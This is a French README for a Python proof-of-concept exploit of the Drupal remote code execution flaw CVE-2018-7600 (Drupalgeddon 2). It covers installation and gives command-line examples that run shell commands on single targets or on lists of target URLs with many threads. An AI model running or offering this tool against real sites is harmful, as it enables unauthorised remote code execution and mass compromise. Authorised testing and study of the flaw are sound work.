
Ce dépôt contient un Proof-of-Concept (PoC) complètement original et développé en interne pour CVE-2018-7600, également connu sous le nom de Drupalgeddon 2 — une vulnérabilité critique d'exécution de code à distance affectant les versions de base de Drupal 7 et 8.
Ce dépôt contient un proof-of-concept en Python pour l'exploitation de la vulnérabilité critique d'exécution de code à distance dans Drupal, connue sous le nom de Drupalgeddon2 (CVE-2018-7600). Ce script est conçu à des fins éducatives et pour les professionnels de la sécurité dans le cadre de tests d'intrusion autorisés.
Cet outil est destiné à un usage légal et éthique uniquement. L'utilisation de ce script sur un système sans autorisation explicite du propriétaire est illégale. L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par ce script. Utilisez-le à vos propres risques.
requestscoloramagit clone <url-du-dépôt>
cd <répertoire-du-dépôt>
pip install -r requirements.txt
pip install requests colorama
Le script propose plusieurs arguments en ligne de commande pour personnaliser son exécution.
Exploiter une seule cible avec la commande par défaut (whoami) :
python3 drupalgeddon2.py -t http://example.com
Exploiter une seule cible avec une commande personnalisée (par exemple ls -la) :
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Scanner une liste de cibles à partir d'un fichier :
Créez un fichier nommé targets.txt avec une URL par ligne :
http://site1.com
https://site2.org
http://site3.net
Puis exécutez le script :
python3 drupalgeddon2.py -l targets.txt
Scanner une liste avec une commande personnalisée et un nombre de threads augmenté :
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Enregistrer la sortie dans un fichier journal :
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Court | Description | Défaut |
|---|---|---|---|
--target | -t | Une seule URL cible. | - |
--list | -l | Chemin vers un fichier contenant une liste d'URLs cibles. | - |
--command | -c | La commande à exécuter sur la cible. | whoami |
--threads | -T | Nombre de threads concurrents à utiliser. | 5 |
--output | -o | Fichier dans lequel enregistrer la sortie. | - |
--timeout | Délai d'attente de la requête en secondes. | 15 |